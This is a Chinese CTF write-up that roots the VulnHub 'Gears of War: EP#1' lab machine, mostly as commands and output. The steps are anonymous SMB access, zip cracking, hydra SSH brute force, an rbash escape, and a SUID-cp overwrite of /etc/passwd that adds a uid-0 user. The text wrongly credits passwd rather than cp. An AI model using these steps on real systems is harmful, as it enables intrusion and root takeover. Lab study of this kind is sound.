免责声明:本文记录的是 Gears of War: EP#1 渗透测试靶机 的解题过程,所有操作均在 本地授权环境 中进行。内容仅供 网络安全学习与防护研究 使用,请勿用于任何非法用途。读者应遵守《网络安全法》及相关法律法规,自觉维护网络空间安全。
https://download.vulnhub.com/gearsofwar/Gear_Of_War%231.ova描述:
这是一台夺旗机,讲述战争齿轮的历史,我们必须尝试逃出监狱并获得根权限。它有一些兔子洞,所以你必须尝试连接轨道才能获得访问权限。
一、信息收集
1、探测目标IP地址
arp-scan -l #探测当前网段的所有ip地址┌──(root㉿kali)-[~]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 08:00:27:63:b0:05, IPv4: 192.168.5.11
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.5.1 0a:00:27:00:00:04 (Unknown: locally administered)
192.168.5.2 08:00:27:e2:78:c4 PCS Systemtechnik GmbH
192.168.5.21 08:00:27:18:35:96 PCS Systemtechnik GmbH
5 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.283 seconds (112.13 hosts/sec). 3 responded
nmap -sP 192.168.5.0/24┌──(root㉿kali)-[~]
└─# nmap -sP 192.168.5.0/24
Starting Nmap 7.98 ( https://nmap.org ) at 2026-02-23 21:35 -0500
Nmap scan report for 192.168.5.1
Host is up (0.00014s latency).
MAC Address: 0A:00:27:00:00:04 (Unknown)
Nmap scan report for 192.168.5.2
Host is up (0.00019s latency).
MAC Address: 08:00:27:E2:78:C4 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.5.21
Host is up (0.00018s latency).
MAC Address: 08:00:27:18:35:96 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.5.11
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 4.95 seconds
目标IP:192.168.5.212、探测目标IP开放端口
nmap -sV -p- 192.168.5.21┌──(root㉿kali)-[~]
└─# nmap -sV -p- 192.168.5.21
Starting Nmap 7.98 ( https://nmap.org ) at 2026-02-23 21:36 -0500
Nmap scan report for 192.168.5.21
Host is up (0.000048s latency).
Not shown: 65531 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: LOCUST)
445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: LOCUST)
MAC Address: 08:00:27:18:35:96 (Oracle VirtualBox virtual NIC)
Service Info: Host: GEARS_OF_WAR; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.65 seconds
端口:22、80、139、4453、网站扫描
┌──(root㉿kali)-[~]
└─# dirsearch -u http://192.168.5.21/
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
from pkg_resources import DistributionNotFound, VersionConflict
_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460
Output File: /root/reports/http_192.168.5.21/__26-02-23_21-36-59.txt
Target: http://192.168.5.21/
[21:36:59] Starting:
[21:37:00] 403 - 277B - /.ht_wsr.txt
[21:37:00] 403 - 277B - /.htaccess.bak1
[21:37:00] 403 - 277B - /.htaccess.orig
[21:37:00] 403 - 277B - /.htaccess.sample
[21:37:00] 403 - 277B - /.htaccess.save
[21:37:00] 403 - 277B - /.htaccess_sc
[21:37:00] 403 - 277B - /.htaccess_orig
[21:37:00] 403 - 277B - /.htaccess_extra
[21:37:00] 403 - 277B - /.htaccessOLD
[21:37:00] 403 - 277B - /.htaccessBAK
[21:37:00] 403 - 277B - /.htaccessOLD2
[21:37:00] 403 - 277B - /.htm
[21:37:00] 403 - 277B - /.html
[21:37:00] 403 - 277B - /.htpasswd_test
[21:37:00] 403 - 277B - /.htpasswds
[21:37:00] 403 - 277B - /.httr-oauth
[21:37:24] 200 - 64B - /robots.txt
[21:37:25] 403 - 277B - /server-status
[21:37:25] 403 - 277B - /server-status/
Task Completed二、漏洞利用
1、访问/robots.txt
/marcus.html
/dom.html
/cole.html
/baird.html
/acarmine.html检查其他的页面没有重要信息
2、SMB探测
a、发现smb
smbmap -H 192.168.5.21
┌──(root㉿kali)-[~]
└─# smbmap -H 192.168.5.21
________ ___ ___ _______ ___ ___ __ _______
/" )|" \ /" || _ "\ |" \ /" | /""\ | __ "\
(: \___/ \ \ // |(. |_) :) \ \ // | / \ (. |__) :)
\___ \ /\ \/. ||: \/ /\ \/. | /' /\ \ |: ____/
__/ \ |: \. |(| _ \ |: \. | // __' \ (| /
/" \ :) |. \ /: ||: |_) :)|. \ /: | / / \ \ /|__/ \
(_______/ |___|\__/|___|(_______/ |___|\__/|___|(___/ \___)(_______)
-----------------------------------------------------------------------------
SMBMap - Samba Share Enumerator v1.10.7 | Shawn Evans - ShawnDEvans@gmail.com
https://github.com/ShawnDEvans/smbmap
[\] Checking for open ports... [*] Detected 1 hosts serving SMB
[|] Initializing hosts... [*] Established 1 SMB connections(s) and 0 authenticated session(s)
[+] IP: 192.168.5.21:445 Name: 192.168.5.21 Status: NULL Session
Disk Permissions Comment
---- ----------- -------
LOCUS_LAN$ READ ONLY LOCUST FATHER
IPC$ NO ACCESS IPC Service (gears_of_war server (Samba, Ubuntu))
[-] Closing connections.. [\] Closing connections.. [|] Closing connections.. [/] Closing connections.. [-] Closing connections.. [*] Closed 1 connections
得到文件夹LOCUS_LAN$
b、访问smb
smbclient //192.168.5.21/LOCUS_LAN$┌──(root㉿kali)-[~]
└─# smbclient //192.168.5.21/LOCUS_LAN$
Password for [WORKGROUP\root]:
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Thu Oct 17 14:06:58 2019
.. D 0 Thu Oct 17 09:51:38 2019
msg_horda.zip N 332 Thu Oct 17 10:53:33 2019
SOS.txt N 198 Thu Oct 17 14:06:58 2019
5190756 blocks of size 1024. 2011892 blocks available
smb: \>
smb: \> get msg_horda.zip
getting file \msg_horda.zip of size 332 as msg_horda.zip (29.5 KiloBytes/sec) (average 29.5 KiloBytes/sec)
smb: \>
smb: \> get SOS.txt
getting file \SOS.txt of size 198 as SOS.txt (17.6 KiloBytes/sec) (average 23.5 KiloBytes/sec)
smb: \>
smb: \> quit
┌──(root㉿kali)-[~]
└─# ls
msg_horda.zip SOS.txt
获取了一个压缩包一个文件
3、生成密码字典
a、查看SOS.txt
┌──(root㉿kali)-[~]
└─# cat SOS.txt
This is a message for the Delta Team.
I found a file that contains a password to free ........ oh no they here!!!!!!!!!!,
i must protect myself, please try to get the password!!
[@%%,]
-Hoffman.这是给 Delta Team 的一条信息。
我找到一个文件,里面包含了解锁……的密码……哦不,他们来了!!!!! 我必须保护自己,请你们试着找到密码!!
[@%%,]
Hoffman。b、尝试解压zip文件
┌──(root㉿kali)-[~]
└─# unzip msg_horda.zip
Archive: msg_horda.zip
[msg_horda.zip] key.txt password:
skipping: key.txt incorrect password
┌──(root㉿kali)-[~]
└─# C、获取密码
# 使用crunch生成字典
crunch 4 4 -t @%%, -o list.txt
# 暴力破解
fcrackzip -D -u -p list.txt msg_horda.zip┌──(root㉿kali)-[~]
└─# crunch 4 4 -t @%%, -o list.txt
Crunch will now generate the following amount of data: 338000 bytes
0 MB
0 GB
0 TB
0 PB
Crunch will now generate the following number of lines: 67600
crunch: 100% completed generating output
┌──(root㉿kali)-[~]
└─# fcrackzip -D -u -p list.txt msg_horda.zip
PASSWORD FOUND!!!!: pw == r44M得到密码解压密码:r44M
E、解压zip文件获取信息
┌──(root㉿kali)-[~]
└─# unzip msg_horda.zip
Archive: msg_horda.zip
[msg_horda.zip] key.txt password:
inflating: key.txt
┌──(root㉿kali)-[~]
└─# ls
46459.py app.pyc e.py key.txt message.txt nitu.kdbx SOS.txt
app64 creds.txt game.txt list.txt msg_horda.zip reports
┌──(root㉿kali)-[~]
└─# cat key.txt
"Vamos a atacar a los humanos con toda nuestras hordas,
por eso puse en prision a el hombre mas peligroso que tenian,
por lo que sin el son debiles."
[[[[[[[[[[[[[[[[[[[[["3_d4y"]]]]]]]]]]]]]]]]]]]]
-General RAAM.得到3_d4y,疑似是一个密码,这里猜测是ssh的密码
4、ssh登录
a、获取密码
hydra -L /usr/share/wordlists/rockyou.txt -p 3_d4y ssh://192.168.5.21┌──(root㉿kali)-[~]
└─# hydra -L /usr/share/wordlists/rockyou.txt -p 3_d4y ssh://192.168.5.21
Hydra v9.6 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2026-02-23 21:46:21
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:14344399/p:1), ~896525 tries per task
[DATA] attacking ssh://192.168.5.21:22/
[STATUS] 335.00 tries/min, 335 tries in 00:01h, 14344069 to do in 713:39h, 11 active
[22][ssh] host: 192.168.5.21 login: marcus password: 3_d4y
[STATUS] 305.67 tries/min, 917 tries in 00:03h, 14343487 to do in 782:06h, 11 active
[STATUS] 305.71 tries/min, 2140 tries in 00:07h, 14342264 to do in 781:54h, 11 active得到账户 marcus/3_d4y
b、登陆ssh
ssh marcus@192.168.5.21
密码:3_d4y┌──(root㉿kali)-[~]
└─# ssh marcus@192.168.5.21
The authenticity of host '192.168.5.21 (192.168.5.21)' can't be established.
ED25519 key fingerprint is: SHA256:63GFdRgqF2ztaC4ps1OyfL9ZA7GOoIvatMoxc/cIb78
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.5.21' (ED25519) to the list of known hosts.
** WARNING: connection is not using a post-quantum key exchange algorithm.
** This session may be vulnerable to "store now, decrypt later" attacks.
** The server may need to be upgraded. See https://openssh.com/pq.html
marcus@192.168.5.21's password:
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-65-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Tue Feb 24 02:48:00 UTC 2026
System load: 0.18 Processes: 118
Usage of /: 56.1% of 4.95GB Users logged in: 0
Memory usage: 20% IP address for enp0s3: 192.168.5.21
Swap usage: 0%
* Canonical Livepatch is available for installation.
- Reduce system reboots and improve kernel security. Activate at:
https://ubuntu.com/livepatch
48 packages can be updated.
0 updates are security updates.
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Last login: Thu Oct 17 18:38:43 2019
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.
marcus@gears_of_war:~$ 登录成功
marcus@gears_of_war:~$ ls -la
total 40
drwxrwxrwx 6 marcus marcus 4096 Oct 17 2019 .
drwxr-xr-x 4 root root 4096 Oct 17 2019 ..
-rw------- 1 marcus marcus 17 Oct 17 2019 .bash_history
-rwxrwxrwx 1 marcus marcus 220 Apr 4 2018 .bash_logout
-rwxrwxrwx 1 marcus marcus 3771 Apr 4 2018 .bashrc
drwxrwxrwx 2 marcus marcus 4096 Oct 16 2019 .cache
drwxrwxrwx 3 marcus marcus 4096 Oct 16 2019 .gnupg
drwxrwxrwx 2 marcus marcus 4096 Oct 17 2019 jail
drwxrwxrwx 3 marcus marcus 4096 Oct 16 2019 .local
-rwxrwxrwx 1 marcus marcus 670 Oct 17 2019 .profile
marcus@gears_of_war:~$
marcus@gears_of_war:~$ cd jail
-rbash: cd: restricted
marcus@gears_of_war:~$
marcus@gears_of_war:~$ 查看当前密码信息,发现只有一个文件夹jail,且访问被限制了。
C、绕过低权限用户的shell的配置文件
ssh marcus@192.168.5.21 -t "bash -noprofile"
密码:3_d4y
通过 SSH 登录到 192.168.5.21 主机上的 marcus 用户,并启动一个新的 Bash shell,且不加载任何用户的配置文件。-t 选项确保了命令在交互式环境下正常工作。这样做通常用于绕过某些限制性 shell 设置,确保以更干净、更受控制的方式进入 Bash 环境。┌──(root㉿kali)-[~]
└─# ssh marcus@192.168.5.21 -t "bash -noprofile"
** WARNING: connection is not using a post-quantum key exchange algorithm.
** This session may be vulnerable to "store now, decrypt later" attacks.
** The server may need to be upgraded. See https://openssh.com/pq.html
marcus@192.168.5.21's password:
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.
marcus@gears_of_war:~$ ls
jail
marcus@gears_of_war:~$ cd jail
marcus@gears_of_war:~/jail$
marcus@gears_of_war:~/jail$ ls
marcus@gears_of_war:~/jail$
marcus@gears_of_war:~/jail$ ls -la
total 8
drwxrwxrwx 2 marcus marcus 4096 Oct 17 2019 .
drwxrwxrwx 6 marcus marcus 4096 Oct 17 2019 ..
marcus@gears_of_war:~/jail$ 什么也没有
三、权限提升
1、查找具有 setuid 权限的可执行文件
find / -type f -perm -u=s 2>/dev/nullmarcus@gears_of_war:~/jail$ find / -type f -perm -u=s 2>/dev/null
/bin/cp
/bin/mount
/bin/ping
/bin/fusermount
/bin/su
/bin/umount
/snap/core/7270/bin/mount
/snap/core/7270/bin/ping
/snap/core/7270/bin/ping6
/snap/core/7270/bin/su
/snap/core/7270/bin/umount
/snap/core/7270/usr/bin/chfn
/snap/core/7270/usr/bin/chsh
/snap/core/7270/usr/bin/gpasswd
/snap/core/7270/usr/bin/newgrp
/snap/core/7270/usr/bin/passwd
/snap/core/7270/usr/bin/sudo
/snap/core/7270/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core/7270/usr/lib/openssh/ssh-keysign
/snap/core/7270/usr/lib/snapd/snap-confine
/snap/core/7270/usr/sbin/pppd
/snap/core/7917/bin/mount
/snap/core/7917/bin/ping
/snap/core/7917/bin/ping6
/snap/core/7917/bin/su
/snap/core/7917/bin/umount
/snap/core/7917/usr/bin/chfn
/snap/core/7917/usr/bin/chsh
/snap/core/7917/usr/bin/gpasswd
/snap/core/7917/usr/bin/newgrp
/snap/core/7917/usr/bin/passwd
/snap/core/7917/usr/bin/sudo
/snap/core/7917/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core/7917/usr/lib/openssh/ssh-keysign
/snap/core/7917/usr/lib/snapd/snap-confine
/snap/core/7917/usr/sbin/pppd
/usr/bin/pkexec
/usr/bin/newuidmap
/usr/bin/gawk
/usr/bin/chsh
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/traceroute6.iputils
/usr/bin/gpasswd
/usr/bin/newgidmap
/usr/bin/chfn
/usr/bin/at
/usr/bin/sudo
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/eject/dmcrypt-get-device
/usr/lib/snapd/snap-confine
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
marcus@gears_of_war:~/jail$ 发现一个重要的漏洞,passwd有setuid权限,直接进行创建用户!
/usr/bin/passwdAI写代码bash2、提权
**# 利用passwd创建用户**
openssl passwd -1 -salt abc 123
# 添加用户和密码及其他信息至passwd文件中
cat /etc/passwd > /tmp/passwd2
vim /tmp/passwd2
cat /tmp/passwd2
# 切换用户
su abc
密码:123
# 获取flag
cd
id
whoami
pwd
ls
ls -la
cat .flag.txtmarcus@gears_of_war:~/jail$ openssl passwd -1 -salt abc 123
$1$abc$98/EDagBiz63dxD3fhRFk1
marcus@gears_of_war:~/jail$
marcus@gears_of_war:~/jail$ cat /etc/passwd > /tmp/passwd2
marcus@gears_of_war:~/jail$
marcus@gears_of_war:~/jail$ vim /tmp/passwd2
marcus@gears_of_war:~/jail$
marcus@gears_of_war:~/jail$
marcus@gears_of_war:~/jail$ cat /tmp/passwd2
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
lxd:x:105:65534::/var/lib/lxd/:/bin/false
uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin
dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:109:1::/var/cache/pollinate:/bin/false
sshd:x:110:65534::/run/sshd:/usr/sbin/nologin
marcus:x:1000:1000:marcus:/home/marcus:/bin/rbash
abc:$1$abc$98/EDagBiz63dxD3fhRFk1:0:0:root:/root:/bin/bash
marcus@gears_of_war:~/jail$
marcus@gears_of_war:~/jail$
marcus@gears_of_war:~/jail$
marcus@gears_of_war:~/jail$ cp /tmp/passwd2 /etc/passwd
marcus@gears_of_war:~/jail$
marcus@gears_of_war:~/jail$
marcus@gears_of_war:~/jail$ su abc
Password:
root@gears_of_war:/home/marcus/jail#
root@gears_of_war:/home/marcus/jail# cd
root@gears_of_war:~#
root@gears_of_war:~# id
uid=0(root) gid=0(root) groups=0(root)
root@gears_of_war:~#
root@gears_of_war:~#
root@gears_of_war:~# whoami
root
root@gears_of_war:~#
root@gears_of_war:~#
root@gears_of_war:~# pwd
/root
root@gears_of_war:~#
root@gears_of_war:~#
root@gears_of_war:~# ls
root@gears_of_war:~#
root@gears_of_war:~#
root@gears_of_war:~# ls -la
total 52
drwx------ 6 root root 4096 Oct 17 2019 .
drwxr-xr-x 24 root root 4096 Oct 16 2019 ..
-rw------- 1 root root 216 Oct 17 2019 .bash_history
-rw-r--r-- 1 root root 3106 Apr 9 2018 .bashrc
drwx------ 2 root root 4096 Oct 17 2019 .cache
-rw-r--r-- 1 root root 12732 Oct 17 2019 .flag.txt
drwx------ 3 root root 4096 Oct 17 2019 .gnupg
drwxr-xr-x 3 root root 4096 Oct 16 2019 .local
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
drwx------ 2 root root 4096 Oct 16 2019 .ssh
root@gears_of_war:~#
root@gears_of_war:~#
root@gears_of_war:~# cat .flag.txt
.,*,,
.*(((#((((*,.
,*/,,,..*/(((/*/#(.
.*//*((####(/,,*,/(#(*
..,*//((*, ....**/**(##########%#(*,*(#/.
.*/((#######((*. ..,*..*,,**///*,,,/(################(//*,.
.,/(((((((((((####/.. ...,,*,****,,*/#####################*/(,.
.,/(((/((#(##########(,.,,,,//((/*/(####(##################(///.
,*(##(#((((/#######%#(###(##################################/((*
.*((#/*/(/(#############(#######################(#((#(######*((*
.*((((#####################################(########((######**/*.
,/##((###########################################(##########*,(///.
*(((###%#####################################################(,****,
.,/(##(#######%%#####%############(#(############################(***,.
.**(##%##%###(#####((###############%######//,,*/((###################(,...
./(##((##%#(##(/(((((##########################/*. *(############%####(,. .
**(####((###((///####%######################%####(*, ,((###############*
.,//*/((((#((/*,,*##################################((/ ./(#%#####%###%###/*****,.
..*//(/*/#(((/(//*/#####################################(/. ./#####%#%#################*.
.,,,*//.**((#(/####(#((((,,(#######################################(* ./(######################(/
,,,/(**((((*///(#(#####(/,../################(#(###(##################( ,((%##############((((#((.
.,*///(####(//(((######((. ,/##################################%######( .*(####%########(##(####*
.**/((((##(((*//(/((###((*. ./((####################(###################( .*(#########(#####(####(
.,***/(///(((/##(/((####(* .,*(###########################(##############*. .*(###%#######/(((##(##,
,*//*/((//(####(((((#/((,. .*##((####################(############(####/(/,, ./(#######((((#((####(*
,/(((((((#(((((//##(((/. ,*#%#####%#########################/,. .*##/*((** ,/################(*
.*(/((//((/((((((/((//, */##############################/. *#((//#(,. ,(##############/
,/((##(((((##(*///*, .*(#%########(########%########(* ,(#(//##* *(##%########(.
./((/###(#(((((((// ./#####%##%###(((#((############/ ./###((((* ,(###%######(*
.*###(##(/(#(#((/, ,/###########( .(####(###*. .,/######(*/* ./###########/
,/(##(#######/(, ,/(###(/##(/. /##########(##(############((. ./#########%#(
/(###((#####/, ,*((((####, ./#####/,((#################(/, ./###########/
/#########((/, */##(/(#/. *###, (( .##############(/(/. ./##%#######(/
(###########(, .(((#(*//* .,(((### (. *(#(######(#(*..*/, ,(#(##%####((/
./(####(#####/. ,((##/,(#############* (, ,(##(#####(*. ....,. *(##%##(##((/,
.*(((##(####%#/ .*((###/(#############(, .(#######(/((##. . ,. ,, .(#######(//*//.
.*/((#(#######(, ,/#((/((##(##(################(#(##((##(/(. . *##(######/(/(#/*
,/((//((#######(*, ,*/(//((#############(########(#*,*...,*/ * ,#######(#/(###(**/,
,(####/(#######(((/, ,*//*/##((#((#(#######,((.,#, *,*.,..,*..(. .##########(((/////**,.
.,*(**(#####%#######(*. ..,*(((**..((((####,,,,#*/*..,,. ,/*/,**/, ./#%####((##/////////***,
..//(/*(################(,, .**,,/. ./(##/*(.* ...*(.,*,* *((##(/. ./###%#((((##(/(((**/***,.
,**((/((#################//*. ,/**#* ,((((/*/ , .,.*(.**/((###### *(##((#(######(//*//((/*,.
*(#(*/(/####(##############((/, ,(##. *(#*,*.(*#* .((//##%##((( ,*(###((((###(######/*,*,.
..,*((/#(((##(################((**. ,####//((###(##/((((#######((/. .*/(###(((((########*/,**,..
...,/#(#//########%#%###########(/**,. *####################%%#(#(*. ,((##((((#/(((#%%#((///*,,.
..*(##((######%#%###############(//**, .##################%###/. .,/(#######(##((//(//**,.
.,*/(########%#####################((/*,. *####%#%%%########(/* .*/((######%%#(////*
.,***//((((#####%###################((/**.. ,/######((*. ,*(####%########(((**.
.,**,****/**/**//***####################(/**,*,,... .,**/*.. ..,,,*/((#####%##########(/.
..,,********,,((####################(#(///******/*///(((###########%#####%###(/.
. ,*******/(###################((#################################(###/,
.,,,/**/##################(#######(#########################((####,
.*/*/#######################################################(#(.
.//############((((########(#######################((####((/*.
. ,(##########(((((((###########################((###(((((((*,
. .((############((((###(*,,*//*///*//(##%############((//**/*,
.*(######(#(#######(**, .*(#######((((/(//**,,
. ,*/#####((((((##/, .*. ./###((((////,.
.,.,,//#########*.. . ,, /((/(/*,
. . . ,../(#####(*/ . . ..
* .. .,/(#*. . .
.,../#, . . .
. . .#/ . .
.. .#/ .
#/
. .(/
. /#
. ,(. . .
.. ,(( .
Congratulation you got out of the jail and finish this Episode#1!
Please share and support me on twitter!
Twitter: @sir809
root@gears_of_war:~#
root@gears_of_war:~#
root@gears_of_war:~#
本文涉及的技术方法仅适用于 授权测试环境 或 合法 CTF 赛事。请勿在未授权的情况下对任何系统进行测试。安全之路,始于合规,终于责任。